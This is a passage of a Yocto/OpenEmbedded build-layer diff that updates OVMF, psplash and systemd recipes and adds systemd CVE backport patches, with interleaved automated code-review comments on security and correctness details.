are used during the build process. Thus, they need to be built natively.
@@ -30,5 +30,5 @@ index 91b1442ade..1858dae31a 100755
source edksetup.sh BaseTools
else
--
-2.17.1
+2.28.0
diff --git a/meta/recipes-core/ovmf/ovmf/0002-BaseTools-makefile-adjust-to-build-in-under-bitbake.patch b/meta/recipes-core/ovmf/ovmf/0002-BaseTools-makefile-adjust-to-build-in-under-bitbake.patch
index f37ed018ab..c61a08f022 100644
--- a/meta/recipes-core/ovmf/ovmf/0002-BaseTools-makefile-adjust-to-build-in-under-bitbake.patch
+++ b/meta/recipes-core/ovmf/ovmf/0002-BaseTools-makefile-adjust-to-build-in-under-bitbake.patch
@@ -1,7 +1,7 @@
-From a8bceaec1b16fffbf6810df05503d8ae9092b735 Mon Sep 17 00:00:00 2001
+From 667c0cf97dadc4f5994d26ec3984f559a05ec406 Mon Sep 17 00:00:00 2001
From: Ricardo Neri <ricardo.neri-calderon@linux.intel.com>
Date: Fri, 26 Jul 2019 17:34:26 -0400
-Subject: [PATCH 2/5] BaseTools: makefile: adjust to build in under bitbake
+Subject: [PATCH 2/4] BaseTools: makefile: adjust to build in under bitbake
Prepend the build flags with those of bitbake. This is to build
using the bitbake native sysroot include and library directories.
@@ -10,14 +10,14 @@ Signed-off-by: Ricardo Neri <ricardo.neri@linux.intel.com>
Upstream-Status: Pending
---
- BaseTools/Source/C/Makefiles/header.makefile | 10 +++++-----
- 1 file changed, 5 insertions(+), 5 deletions(-)
+ BaseTools/Source/C/Makefiles/header.makefile | 17 +++++++++--------
+ 1 file changed, 9 insertions(+), 8 deletions(-)
diff --git a/BaseTools/Source/C/Makefiles/header.makefile b/BaseTools/Source/C/Makefiles/header.makefile
-index 4e9b36d98b..eb03ee33fa 100644
+index 1c105ee7d4..d5eea3864e 100644
--- a/BaseTools/Source/C/Makefiles/header.makefile
+++ b/BaseTools/Source/C/Makefiles/header.makefile
-@@ -62,23 +62,23 @@ $(error Bad HOST_ARCH)
+@@ -69,35 +69,36 @@ $(error Bad HOST_ARCH)
endif
INCLUDE = $(TOOL_INCLUDE) -I $(MAKEROOT) -I $(MAKEROOT)/Include/Common -I $(MAKEROOT)/Include/ -I $(MAKEROOT)/Include/IndustryStandard -I $(MAKEROOT)/Common/ -I .. -I . $(ARCH_INCLUDE)
@@ -33,19 +33,35 @@ index 4e9b36d98b..eb03ee33fa 100644
+BUILD_CFLAGS += -MD -fshort-wchar -fno-strict-aliasing -Wall -Werror \
-Wno-deprecated-declarations -Wno-self-assign -Wno-unused-result -nostdlib -g
else
+ ifeq ($(CXX), llvm)
+-BUILD_CFLAGS = -MD -fshort-wchar -fno-strict-aliasing -fwrapv \
++BUILD_CFLAGS += -MD -fshort-wchar -fno-strict-aliasing -fwrapv \
+ -fno-delete-null-pointer-checks -Wall -Werror \
+ -Wno-deprecated-declarations -Wno-self-assign \
+ -Wno-unused-result -nostdlib -g
+ else
-BUILD_CFLAGS = -MD -fshort-wchar -fno-strict-aliasing -fwrapv \
+BUILD_CFLAGS += -MD -fshort-wchar -fno-strict-aliasing -fwrapv \
-fno-delete-null-pointer-checks -Wall -Werror \
-Wno-deprecated-declarations -Wno-stringop-truncation -Wno-restrict \
-Wno-unused-result -nostdlib -g
endif
+ endif
+ ifeq ($(CXX), llvm)
+-BUILD_LFLAGS =
+-BUILD_CXXFLAGS = -Wno-deprecated-register -Wno-unused-result
++BUILD_LFLAGS = $(LDFLAGS)
++BUILD_CXXFLAGS += -Wno-deprecated-register -Wno-unused-result
+ else
-BUILD_LFLAGS =
-BUILD_CXXFLAGS = -Wno-unused-result
+BUILD_LFLAGS = $(LDFLAGS)
+BUILD_CXXFLAGS += -Wno-unused-result
-
+ endif
++
ifeq ($(HOST_ARCH), IA32)
#
+ # Snow Leopard is a 32-bit and 64-bit environment. uname -m returns i386, but gcc defaults
--
-2.17.1
+2.28.0
diff --git a/meta/recipes-core/ovmf/ovmf/0003-ovmf-enable-long-path-file.patch b/meta/recipes-core/ovmf/ovmf/0003-ovmf-enable-long-path-file.patch
index ab1e7db31f..df1d159011 100644
--- a/meta/recipes-core/ovmf/ovmf/0003-ovmf-enable-long-path-file.patch
+++ b/meta/recipes-core/ovmf/ovmf/0003-ovmf-enable-long-path-file.patch
@@ -1,7 +1,7 @@
-From 60a5f953f747e1e9e05a40157b651cba8ea57b91 Mon Sep 17 00:00:00 2001
+From e19481e5a64f8915ac118899b10c40d12c0f9daa Mon Sep 17 00:00:00 2001
From: Dengke Du <dengke.du@windriver.com>
Date: Mon, 11 Sep 2017 02:21:55 -0400
-Subject: [PATCH 3/5] ovmf: enable long path file
+Subject: [PATCH 3/4] ovmf: enable long path file
Upstream-Status: Pending
Signed-off-by: Dengke Du <dengke.du@windriver.com>
@@ -24,5 +24,5 @@ index e1cce985f7..d67d03c70c 100644
#define MAX_UINT64 ((UINT64)0xFFFFFFFFFFFFFFFFULL)
#define MAX_UINT32 ((UINT32)0xFFFFFFFF)
--
-2.17.1
+2.28.0
diff --git a/meta/recipes-core/ovmf/ovmf/0004-ovmf-Update-to-latest.patch b/meta/recipes-core/ovmf/ovmf/0004-ovmf-Update-to-latest.patch
index c10a39d95d..128438b201 100644
--- a/meta/recipes-core/ovmf/ovmf/0004-ovmf-Update-to-latest.patch
+++ b/meta/recipes-core/ovmf/ovmf/0004-ovmf-Update-to-latest.patch
@@ -1,7 +1,7 @@
-From 94eff316b31b4d0348af28c77be5c00bc09fe8e7 Mon Sep 17 00:00:00 2001
+From ad06fcf1e08736e79221cd6863ff2e3c9254f261 Mon Sep 17 00:00:00 2001
From: Steve Langasek <steve.langasek@ubuntu.com>
Date: Sat, 10 Jun 2017 01:39:36 -0700
-Subject: [PATCH 4/5] ovmf: Update to latest
+Subject: [PATCH 4/4] ovmf: Update to latest
Description: pass -fno-stack-protector to all GCC toolchains
The upstream build rules inexplicably pass -fno-stack-protector only
@@ -15,15 +15,15 @@ Upstream-Status: Pending
1 file changed, 4 insertions(+), 4 deletions(-)
diff --git a/BaseTools/Conf/tools_def.template b/BaseTools/Conf/tools_def.template
-index ca0b122dbb..b0066c2ab8 100755
+index 933b3160fd..c2fbbf0c38 100755
--- a/BaseTools/Conf/tools_def.template
+++ b/BaseTools/Conf/tools_def.template
-@@ -1941,10 +1941,10 @@ DEFINE GCC_X64_RC_FLAGS = -I binary -O elf64-x86-64 -B i386
- DEFINE GCC_ARM_RC_FLAGS = -I binary -O elf32-littlearm -B arm --rename-section .data=.hii
- DEFINE GCC_AARCH64_RC_FLAGS = -I binary -O elf64-littleaarch64 -B aarch64 --rename-section .data=.hii
+@@ -1952,10 +1952,10 @@ DEFINE GCC_RISCV64_RC_FLAGS = -I binary -O elf64-littleriscv -B riscv
+ # GCC Build Flag for included header file list generation
+ DEFINE GCC_DEPS_FLAGS = -MMD -MF $@.deps
--DEFINE GCC48_ALL_CC_FLAGS = -g -fshort-wchar -fno-builtin -fno-strict-aliasing -Wall -Werror -Wno-array-bounds -ffunction-sections -fdata-sections -include AutoGen.h -fno-common -DSTRING_ARRAY_NAME=$(BASE_NAME)Strings
-+DEFINE GCC48_ALL_CC_FLAGS = -g -fshort-wchar -fno-builtin -fno-strict-aliasing -Wall -Werror -Wno-array-bounds -ffunction-sections -fdata-sections -fno-stack-protector -include AutoGen.h -fno-common -DSTRING_ARRAY_NAME=$(BASE_NAME)Strings
+-DEFINE GCC48_ALL_CC_FLAGS = DEF(GCC_ALL_CC_FLAGS) -ffunction-sections -fdata-sections -DSTRING_ARRAY_NAME=$(BASE_NAME)Strings
++DEFINE GCC48_ALL_CC_FLAGS = DEF(GCC_ALL_CC_FLAGS) -ffunction-sections -fdata-sections -fno-stack-protector -DSTRING_ARRAY_NAME=$(BASE_NAME)Strings
DEFINE GCC48_IA32_X64_DLINK_COMMON = -nostdlib -Wl,-n,-q,--gc-sections -z common-page-size=0x20
-DEFINE GCC48_IA32_CC_FLAGS = DEF(GCC48_ALL_CC_FLAGS) -m32 -march=i586 -malign-double -fno-stack-protector -D EFI32 -fno-asynchronous-unwind-tables -Wno-address
-DEFINE GCC48_X64_CC_FLAGS = DEF(GCC48_ALL_CC_FLAGS) -m64 -fno-stack-protector "-DEFIAPI=__attribute__((ms_abi))" -maccumulate-outgoing-args -mno-red-zone -Wno-address -mcmodel=small -fpie -fno-asynchronous-unwind-tables -Wno-address
@@ -32,7 +32,7 @@ index ca0b122dbb..b0066c2ab8 100755
DEFINE GCC48_IA32_X64_ASLDLINK_FLAGS = DEF(GCC48_IA32_X64_DLINK_COMMON) -Wl,--entry,ReferenceAcpiTable -u ReferenceAcpiTable
DEFINE GCC48_IA32_X64_DLINK_FLAGS = DEF(GCC48_IA32_X64_DLINK_COMMON) -Wl,--entry,$(IMAGE_ENTRY_POINT) -u $(IMAGE_ENTRY_POINT) -Wl,-Map,$(DEST_DIR_DEBUG)/$(BASE_NAME).map,--whole-archive
DEFINE GCC48_IA32_DLINK2_FLAGS = -Wl,--defsym=PECOFF_HEADER_SIZE=0x220 DEF(GCC_DLINK2_FLAGS_COMMON)
-@@ -1953,7 +1953,7 @@ DEFINE GCC48_X64_DLINK2_FLAGS = -Wl,--defsym=PECOFF_HEADER_SIZE=0x228 DEF
+@@ -1964,7 +1964,7 @@ DEFINE GCC48_X64_DLINK2_FLAGS = -Wl,--defsym=PECOFF_HEADER_SIZE=0x228 DEF
DEFINE GCC48_ASM_FLAGS = DEF(GCC_ASM_FLAGS)
DEFINE GCC48_ARM_ASM_FLAGS = $(ARCHASM_FLAGS) $(PLATFORM_FLAGS) DEF(GCC_ASM_FLAGS) -mlittle-endian
DEFINE GCC48_AARCH64_ASM_FLAGS = $(ARCHASM_FLAGS) $(PLATFORM_FLAGS) DEF(GCC_ASM_FLAGS) -mlittle-endian
@@ -42,5 +42,5 @@ index ca0b122dbb..b0066c2ab8 100755
DEFINE GCC48_AARCH64_CC_FLAGS = $(ARCHCC_FLAGS) $(PLATFORM_FLAGS) -mcmodel=large DEF(GCC_AARCH64_CC_FLAGS)
DEFINE GCC48_AARCH64_CC_XIPFLAGS = DEF(GCC_AARCH64_CC_XIPFLAGS)
--
-2.17.1
+2.28.0
diff --git a/meta/recipes-core/ovmf/ovmf_git.bb b/meta/recipes-core/ovmf/ovmf_git.bb
index 9667fa0c86..a487f77e3c 100644
--- a/meta/recipes-core/ovmf/ovmf_git.bb
+++ b/meta/recipes-core/ovmf/ovmf_git.bb
@@ -12,15 +12,19 @@ LIC_FILES_CHKSUM = "file://OvmfPkg/License.txt;md5=06357ddc23f46577c2aeaeaf7b776
PACKAGECONFIG ??= ""
PACKAGECONFIG[secureboot] = ",,,"
-SRC_URI = "gitsm://github.com/tianocore/edk2.git;branch=master;protocol=git \
+SRC_URI = "gitsm://github.com/tianocore/edk2.git;branch=master;protocol=https \
file://0001-ovmf-update-path-to-native-BaseTools.patch \
file://0002-BaseTools-makefile-adjust-to-build-in-under-bitbake.patch \
file://0003-ovmf-enable-long-path-file.patch \
file://0004-ovmf-Update-to-latest.patch \
- "
-
-PV = "edk2-stable201911"
-SRCREV = "bd85bf54c268204c7a698a96f3ccd96cd77952cd"
+ file://0001-Fix-VLA-parameter-warning.patch \
+ file://0001-Basetools-genffs-fix-gcc12-warning.patch \
+ file://0001-Basetools-lzmaenc-fix-gcc12-warning.patch \
+ file://0001-Basetools-turn-off-gcc12-warning.patch \
+ "
+
+PV = "edk2-stable202008"
+SRCREV = "06dc822d045c2bb42e497487935485302486e151"
UPSTREAM_CHECK_GITTAGREGEX = "(?P<pver>edk2-stable.*)"
inherit deploy
@@ -37,7 +41,7 @@ EDK_TOOLS_DIR="edk2_basetools"
BUILD_OPTIMIZATION="-pipe"
# OVMF supports IA only, although it could conceivably support ARM someday.
-COMPATIBLE_HOST='(i.86|x86_64).*'
+COMPATIBLE_HOST_class-target='(i.86|x86_64).*'
# Additional build flags for OVMF with Secure Boot.
# Fedora also uses "-D SMM_REQUIRE -D EXCLUDE_SHELL_FROM_FD".
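Review bot: The comment above `COMPATIBLE_HOST_class-target` still reads "OVMF supports IA only", but the restriction now applies to the target class alone and nothing in the hunk says why other classes are exempt. Presumably the native variant only builds host-side tools and should not be limited to x86 build hosts. A line such as `# Only the target firmware is IA-specific; other classes are not restricted.` next to the assignment would make that explicit.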
diff --git a/meta/recipes-core/packagegroups/packagegroup-core-ssh-dropbear.bb b/meta/recipes-core/packagegroups/packagegroup-core-ssh-dropbear.bb
index 5ec3f6c927..5523f874db 100644
--- a/meta/recipes-core/packagegroups/packagegroup-core-ssh-dropbear.bb
+++ b/meta/recipes-core/packagegroups/packagegroup-core-ssh-dropbear.bb
@@ -4,3 +4,4 @@ PR = "r1"
inherit packagegroup
RDEPENDS_${PN} = "dropbear"
+RRECOMMENDS_${PN} = "openssh-sftp-server"
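Review bot: `RRECOMMENDS_${PN} = "openssh-sftp-server"` adds another remotely reachable binary to every image that pulls in this packagegroup, and the line carries no comment saying why. Presumably it is there so that SFTP-based clients (recent OpenSSH `scp` defaults to the SFTP protocol) can still copy files to a dropbear target; stating that keeps the dependency from looking accidental. Proposed comment above the line: `# scp/sftp clients need an sftp-server on the target; drop via BAD_RECOMMENDATIONS if file transfer is not wanted`. Using RRECOMMENDS rather than RDEPENDS does leave image owners that opt-out.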
diff --git a/meta/recipes-core/psplash/files/psplash-start.service b/meta/recipes-core/psplash/files/psplash-start.service
index 36c2bb38e0..bec9368427 100644
--- a/meta/recipes-core/psplash/files/psplash-start.service
+++ b/meta/recipes-core/psplash/files/psplash-start.service
@@ -2,6 +2,7 @@
Description=Start psplash boot splash screen
DefaultDependencies=no
RequiresMountsFor=/run
+ConditionFileIsExecutable=/usr/bin/psplash
[Service]
Type=notify
diff --git a/meta/recipes-core/psplash/files/psplash-systemd.service b/meta/recipes-core/psplash/files/psplash-systemd.service
index 082207f232..e93e3deb35 100644
--- a/meta/recipes-core/psplash/files/psplash-systemd.service
+++ b/meta/recipes-core/psplash/files/psplash-systemd.service
@@ -4,6 +4,7 @@ DefaultDependencies=no
After=psplash-start.service
Requires=psplash-start.service
RequiresMountsFor=/run
+ConditionFileIsExecutable=/usr/bin/psplash
[Service]
ExecStart=/usr/bin/psplash-systemd
diff --git a/meta/recipes-core/psplash/psplash_git.bb b/meta/recipes-core/psplash/psplash_git.bb
index 22c71f099b..b2947c2114 100644
--- a/meta/recipes-core/psplash/psplash_git.bb
+++ b/meta/recipes-core/psplash/psplash_git.bb
@@ -10,7 +10,7 @@ SRCREV = "0a902f7cd875ccf018456451be369f05fa55f962"
PV = "0.1+git${SRCPV}"
PR = "r15"
-SRC_URI = "git://git.yoctoproject.org/${BPN} \
+SRC_URI = "git://git.yoctoproject.org/${BPN};branch=master \
file://psplash-init \
file://psplash-start.service \
file://psplash-systemd.service \
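Review bot: The new SRC_URI still fetches over the fetcher's default `git://` transport, which is unauthenticated and unencrypted, while the ovmf and systemd recipes in this same commit were moved to `protocol=https`. The pinned `SRCREV` shown in the hunk header limits what a tampered transfer can achieve, but the fetch can still be observed or blocked on the path. If git.yoctoproject.org serves this repository over HTTPS, `SRC_URI = "git://git.yoctoproject.org/${BPN};branch=master;protocol=https \` would bring it in line with the others. The SRC_URI assignment continues past the end of the hunk.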
diff --git a/meta/recipes-core/systemd/systemd-boot_244.3.bb b/meta/recipes-core/systemd/systemd-boot_244.5.bb
index f92c639810..f92c639810 100644
--- a/meta/recipes-core/systemd/systemd-boot_244.3.bb
+++ b/meta/recipes-core/systemd/systemd-boot_244.5.bb
diff --git a/meta/recipes-core/systemd/systemd-conf/wired.network b/meta/recipes-core/systemd/systemd-conf/wired.network
index ff807ba31f..34c20fcb24 100644
--- a/meta/recipes-core/systemd/systemd-conf/wired.network
+++ b/meta/recipes-core/systemd/systemd-conf/wired.network
@@ -1,6 +1,7 @@
[Match]
Name=en* eth*
KernelCommandLine=!nfsroot
+KernelCommandLine=!ip
[Network]
DHCP=yes
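Review bot: Adding a second `KernelCommandLine=` line to `[Match]` may not combine with the first one. As far as I recall, networkd's parser for these condition keys in this systemd generation drops the previous assignment when the key is set again, which would leave only `!ip` in effect and silently lose the `!nfsroot` exclusion. That matters more now because the same commit stops deleting this file for qemu machines, so a network-root boot that slips past the match would have DHCP reconfigure the interface the root filesystem depends on. Please confirm on a target booted with `nfsroot=` but without `ip=` that the file is skipped; if only the last line wins, the match needs a different form.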
diff --git a/meta/recipes-core/systemd/systemd-conf_244.3.bb b/meta/recipes-core/systemd/systemd-conf_244.3.bb
index d9ec023bfd..9b797a91f4 100644
--- a/meta/recipes-core/systemd/systemd-conf_244.3.bb
+++ b/meta/recipes-core/systemd/systemd-conf_244.3.bb
@@ -23,9 +23,6 @@ do_install() {
# Based on change from YP bug 8141, OE commit 5196d7bacaef1076c361adaa2867be31759c1b52
do_install_append_qemuall() {
install -D -m0644 ${WORKDIR}/system.conf-qemuall ${D}${systemd_unitdir}/system.conf.d/01-${PN}.conf
-
- # Do not install wired.network for qemu bsps
- rm -rf ${D}${systemd_unitdir}/network
}
PACKAGE_ARCH = "${MACHINE_ARCH}"
diff --git a/meta/recipes-core/systemd/systemd-systemctl/systemctl b/meta/recipes-core/systemd/systemd-systemctl/systemctl
index 990de1ab39..e003c860e3 100755
--- a/meta/recipes-core/systemd/systemd-systemctl/systemctl
+++ b/meta/recipes-core/systemd/systemd-systemctl/systemctl
@@ -11,6 +11,7 @@ import re
import sys
from collections import namedtuple
+from itertools import chain
from pathlib import Path
version = 1.0
@@ -25,12 +26,16 @@ locations = list()
class SystemdFile():
"""Class representing a single systemd configuration file"""
- def __init__(self, root, path):
+ def __init__(self, root, path, instance_unit_name):
self.sections = dict()
self._parse(root, path)
dirname = os.path.basename(path.name) + ".d"
for location in locations:
- for path2 in sorted((root / location / "system" / dirname).glob("*.conf")):
+ files = (root / location / "system" / dirname).glob("*.conf")
+ if instance_unit_name:
+ inst_dirname = instance_unit_name + ".d"
+ files = chain(files, (root / location / "system" / inst_dirname).glob("*.conf"))
+ for path2 in sorted(files):
self._parse(root, path2)
def _parse(self, root, path):
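Review bot: `sorted(files)` in `SystemdFile.__init__` orders the merged drop-ins by full path, so all files of one `.d` directory are parsed before all files of the other, and which directory comes first depends on the characters of the instance name. systemd merges drop-ins from every directory in file-name order, so a `10-*.conf` for the instance can end up parsed after a `20-*.conf` of the template here and be overridden by it. Sorting on the base name keeps precedence predictable: `for path2 in sorted(files, key=lambda p: p.name):`. The loop still runs once per entry in `locations`, so ordering across locations is not changed by this hunk; `_parse` continues outside it.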
@@ -177,12 +182,14 @@ class SystemdUnit():
raise SystemdUnitNotFoundError(self.root, unit)
- def _process_deps(self, config, service, location, prop, dirstem):
+ def _process_deps(self, config, service, location, prop, dirstem, instance):
systemdir = self.root / SYSCONFDIR / "systemd" / "system"
target = ROOT / location.relative_to(self.root)
try:
for dependent in config.get('Install', prop):
+ # expand any %i to instance (ignoring escape sequence %%)
+ dependent = re.sub("([^%](%%)*)%i", "\\g<1>{}".format(instance), dependent)
wants = systemdir / "{}.{}".format(dependent, dirstem) / service
add_link(wants, target)
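Review bot: The `re.sub` added to `_process_deps` builds its replacement template from `instance`, so an instance name containing a backslash (systemd-escaped names such as `\x2d`) is interpreted as a replacement escape and can raise `re.error` or be altered before the symlink path is formed. The pattern also requires a non-`%` character in front of `%i`, so a `WantedBy=`/`RequiredBy=` value that starts with `%i` is left unexpanded. A callable replacement with a lookbehind handles both: `dependent = re.sub(r"(?<!%)((?:%%)*)%i", lambda m: m.group(1) + instance, dependent)`. For a non-template unit `instance` is `None`, so the substitution should probably be skipped in that case rather than inserting the text `None`. The function body continues past the end of the hunk.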
@@ -193,8 +200,11 @@ class SystemdUnit():
# if we're enabling an instance, first extract the actual instance
# then figure out what the template unit is
template = re.match(r"[^@]+@(?P<instance>[^\.]*)\.", self.unit)
+ instance_unit_name = None
if template:
instance = template.group('instance')
+ if instance != "":
+ instance_unit_name = self.unit
unit = re.sub(r"@[^\.]*\.", "@.", self.unit, 1)
else:
instance = None
@@ -206,7 +216,7 @@ class SystemdUnit():
# ignore aliases
return
- config = SystemdFile(self.root, path)
+ config = SystemdFile(self.root, path, instance_unit_name)
if instance == "":
try:
default_instance = config.get('Install', 'DefaultInstance')[0]
@@ -219,8 +229,8 @@ class SystemdUnit():
else:
service = self.unit
- self._process_deps(config, service, path, 'WantedBy', 'wants')
- self._process_deps(config, service, path, 'RequiredBy', 'requires')
+ self._process_deps(config, service, path, 'WantedBy', 'wants', instance)
+ self._process_deps(config, service, path, 'RequiredBy', 'requires', instance)
try:
for also in config.get('Install', 'Also'):
diff --git a/meta/recipes-core/systemd/systemd.inc b/meta/recipes-core/systemd/systemd.inc
index e73b397b5d..8b5260bb0d 100644
--- a/meta/recipes-core/systemd/systemd.inc
+++ b/meta/recipes-core/systemd/systemd.inc
@@ -14,8 +14,8 @@ LICENSE = "GPLv2 & LGPLv2.1"
LIC_FILES_CHKSUM = "file://LICENSE.GPL2;md5=751419260aa954499f7abaabaa882bbe \
file://LICENSE.LGPL2.1;md5=4fbd65380cdd255951079008b364516c"
-SRCREV = "b7ed902b2394f94e7f1fbe6c3194b5cd9a9429e6"
+SRCREV = "3ceaa81c61b654ebf562464d142675bd4d57d7b6"
SRCBRANCH = "v244-stable"
-SRC_URI = "git://github.com/systemd/systemd-stable.git;protocol=git;branch=${SRCBRANCH}"
+SRC_URI = "git://github.com/systemd/systemd-stable.git;protocol=https;branch=${SRCBRANCH}"
S = "${WORKDIR}/git"
diff --git a/meta/recipes-core/systemd/systemd/00-create-volatile.conf b/meta/recipes-core/systemd/systemd/00-create-volatile.conf
index 87cbe1e7d3..c4277221a2 100644
--- a/meta/recipes-core/systemd/systemd/00-create-volatile.conf
+++ b/meta/recipes-core/systemd/systemd/00-create-volatile.conf
@@ -3,5 +3,6 @@
# inside /var/log.
+d /run/lock 1777 - - -
d /var/volatile/log - - - -
d /var/volatile/tmp 1777 - -
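Review bot: The added `d /run/lock 1777 - - -` creates a world-writable lock directory with no comment saying which consumer needs that mode. With 1777 any local account can create files there, which lets an unprivileged user pre-create a lock name that a privileged service expects, or consume space on the `/run` tmpfs. If every lock user on the image runs as root or shares a group, a tighter mode would do. Otherwise record the reason next to the line, for example `# /run/lock must be world-writable because <consumer> creates lock files as an unprivileged user`.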
diff --git a/meta/recipes-core/systemd/systemd/CVE-2018-21029.patch b/meta/recipes-core/systemd/systemd/CVE-2018-21029.patch
new file mode 100644
index 0000000000..8d3801a248
--- /dev/null
+++ b/meta/recipes-core/systemd/systemd/CVE-2018-21029.patch
@@ -0,0 +1,120 @@
+From 3f9d9289ee8730a81a0464539f4e1ba2d23d0ce9 Mon Sep 17 00:00:00 2001
+From: =?UTF-8?q?J=C3=B6rg=20Thalheim?= <joerg@thalheim.io>
+Date: Tue, 3 Mar 2020 23:31:25 +0000
+Subject: [PATCH] systemd-resolved: use hostname for certificate validation in
+ DoT
+
+Widely accepted certificates for IP addresses are expensive and only
+affordable for larger organizations. Therefore if the user provides
+the hostname in the DNS= option, we should use it instead of the IP
+address.
+
+(cherry picked from commit eec394f10bbfcc3d2fc8504ad8ff5be44231abd5)
+
+CVE: CVE-2018-21029
+Upstream-Status: Backport [ff26d281aec0877b43269f18c6282cd79a7f5529]
+Signed-off-by: Marek Vasut <marex@denx.de>
+---
+ man/resolved.conf.xml | 16 +++++++++++-----
+ src/resolve/resolved-dnstls-gnutls.c | 20 ++++++++++++--------
+ src/resolve/resolved-dnstls-openssl.c | 15 +++++++++++----
+ 3 files changed, 34 insertions(+), 17 deletions(-)
+
+diff --git a/man/resolved.conf.xml b/man/resolved.conf.xml
+index 818000145b..37161ebcbc 100644
+--- a/man/resolved.conf.xml
++++ b/man/resolved.conf.xml
+@@ -193,11 +193,17 @@
+ <varlistentry>
+ <term><varname>DNSOverTLS=</varname></term>
+ <listitem>
+- <para>Takes a boolean argument or <literal>opportunistic</literal>.
+- If true all connections to the server will be encrypted. Note that
+- this mode requires a DNS server that supports DNS-over-TLS and has
+- a valid certificate for it's IP. If the DNS server does not support
+- DNS-over-TLS all DNS requests will fail. When set to <literal>opportunistic</literal>
++ <para>Takes a boolean argument or <literal>opportunistic</literal>. If
++ true all connections to the server will be encrypted. Note that this
++ mode requires a DNS server that supports DNS-over-TLS and has a valid
++ certificate. If the hostname was specified in <varname>DNS=</varname>
++ by using the format format <literal>address#server_name</literal> it
++ is used to validate its certificate and also to enable Server Name
++ Indication (SNI) when opening a TLS connection. Otherwise
++ the certificate is checked against the server's IP.
++ If the DNS server does not support DNS-over-TLS all DNS requests will fail.</para>
++
++ <para>When set to <literal>opportunistic</literal>
+ DNS request are attempted to send encrypted with DNS-over-TLS.
+ If the DNS server does not support TLS, DNS-over-TLS is disabled.
+ Note that this mode makes DNS-over-TLS vulnerable to "downgrade"
+diff --git a/src/resolve/resolved-dnstls-gnutls.c b/src/resolve/resolved-dnstls-gnutls.c
+index ed0a31e8bf..c7215723a7 100644
+--- a/src/resolve/resolved-dnstls-gnutls.c
++++ b/src/resolve/resolved-dnstls-gnutls.c
+@@ -56,15 +56,19 @@ int dnstls_stream_connect_tls(DnsStream *stream, DnsServer *server) {
+ }
+
+ if (server->manager->dns_over_tls_mode == DNS_OVER_TLS_YES) {
+- stream->dnstls_data.validation.type = GNUTLS_DT_IP_ADDRESS;
+- if (server->family == AF_INET) {
+- stream->dnstls_data.validation.data = (unsigned char*) &server->address.in.s_addr;
+- stream->dnstls_data.validation.size = 4;
+- } else {
+- stream->dnstls_data.validation.data = server->address.in6.s6_addr;
+- stream->dnstls_data.validation.size = 16;
++ if (server->server_name)
++ gnutls_session_set_verify_cert(gs, server->server_name, 0);
++ else {
++ stream->dnstls_data.validation.type = GNUTLS_DT_IP_ADDRESS;
++ if (server->family == AF_INET) {
++ stream->dnstls_data.validation.data = (unsigned char*) &server->address.in.s_addr;
++ stream->dnstls_data.validation.size = 4;
++ } else {
++ stream->dnstls_data.validation.data = server->address.in6.s6_addr;
++ stream->dnstls_data.validation.size = 16;
++ }
++ gnutls_session_set_verify_cert2(gs, &stream->dnstls_data.validation, 1, 0);
+ }
+- gnutls_session_set_verify_cert2(gs, &stream->dnstls_data.validation, 1, 0);
+ }
+
+ gnutls_handshake_set_timeout(gs, GNUTLS_DEFAULT_HANDSHAKE_TIMEOUT);
+diff --git a/src/resolve/resolved-dnstls-openssl.c b/src/resolve/resolved-dnstls-openssl.c
+index 85e202ff74..007aedaa5b 100644
+--- a/src/resolve/resolved-dnstls-openssl.c
++++ b/src/resolve/resolved-dnstls-openssl.c
+@@ -6,6 +6,7 @@
+
+ #include <openssl/bio.h>
+ #include <openssl/err.h>
++#include <openssl/x509v3.h>
+
+ #include "io-util.h"
+ #include "resolved-dns-stream.h"
+@@ -78,13 +79,19 @@ int dnstls_stream_connect_tls(DnsStream *stream, DnsServer *server) {
+
+ if (server->manager->dns_over_tls_mode == DNS_OVER_TLS_YES) {
+ X509_VERIFY_PARAM *v;
+- const unsigned char *ip;
+
+ SSL_set_verify(s, SSL_VERIFY_PEER, NULL);
+ v = SSL_get0_param(s);
+- ip = server->family == AF_INET ? (const unsigned char*) &server->address.in.s_addr : server->address.in6.s6_addr;
+- if (!X509_VERIFY_PARAM_set1_ip(v, ip, FAMILY_ADDRESS_SIZE(server->family)))
+- return -ECONNREFUSED;
++ if (server->server_name) {
++ X509_VERIFY_PARAM_set_hostflags(v, X509_CHECK_FLAG_NO_PARTIAL_WILDCARDS);
++ if (X509_VERIFY_PARAM_set1_host(v, server->server_name, 0) == 0)
++ return -ECONNREFUSED;
++ } else {
++ const unsigned char *ip;
++ ip = server->family == AF_INET ? (const unsigned char*) &server->address.in.s_addr : server->address.in6.s6_addr;
++ if (X509_VERIFY_PARAM_set1_ip(v, ip, FAMILY_ADDRESS_SIZE(server->family)) == 0)
++ return -ECONNREFUSED;
++ }
+ }
+
+ ERR_clear_error();
+--
+2.40.1
+
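Review bot: The documentation hunk says the name given as `address#server_name` is used both to validate the certificate and to enable SNI, but the two backend hunks only set the verification name (`gnutls_session_set_verify_cert` and `X509_VERIFY_PARAM_set1_host`); no SNI call such as `gnutls_server_name_set` or `SSL_set_tlsext_host_name` appears in them. Both `dnstls_stream_connect_tls` bodies extend beyond the hunks, so this may already be handled there, but it is worth confirming against the 244 tree, along with whether `server->server_name` is ever populated in this version. If it is not, the new branch is never taken, validation stays IP-only, and the `CVE: CVE-2018-21029` tag would still mark the issue as patched for CVE scanning.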
diff --git a/meta/recipes-core/systemd/systemd/CVE-2020-13529.patch b/meta/recipes-core/systemd/systemd/CVE-2020-13529.patch
new file mode 100644
index 0000000000..6b499efbd8
--- /dev/null
+++ b/meta/recipes-core/systemd/systemd/CVE-2020-13529.patch
@@ -0,0 +1,42 @@
+From 38e980a6a5a3442c2f48b1f827284388096d8ca5 Mon Sep 17 00:00:00 2001
+From: Yu Watanabe <watanabe.yu+github@gmail.com>
+Date: Thu, 24 Jun 2021 01:22:07 +0900
+Subject: [PATCH] sd-dhcp-client: tentatively ignore FORCERENEW command
+
+This makes DHCP client ignore FORCERENEW requests, as unauthenticated
+FORCERENEW requests causes a security issue (TALOS-2020-1142, CVE-2020-13529).
+
+Let's re-enable this after RFC3118 (Authentication for DHCP Messages)
+and/or RFC6704 (Forcerenew Nonce Authentication) are implemented.
+
+Fixes #16774.
+
+Upstream-Status: Backport [https://github.com/systemd/systemd/commit/38e980a6a5a3442c2f48b1f827284388096d8ca5]
+CVE: CVE-2020-13529
+
+Signed-off-by: Ranjitsinh Rathod <ranjitsinh.rathod@kpit.com>
+
+---
+ src/libsystemd-network/sd-dhcp-client.c | 8 ++++++++
+ 1 file changed, 8 insertions(+)
+
+--- a/src/libsystemd-network/sd-dhcp-client.c
++++ b/src/libsystemd-network/sd-dhcp-client.c
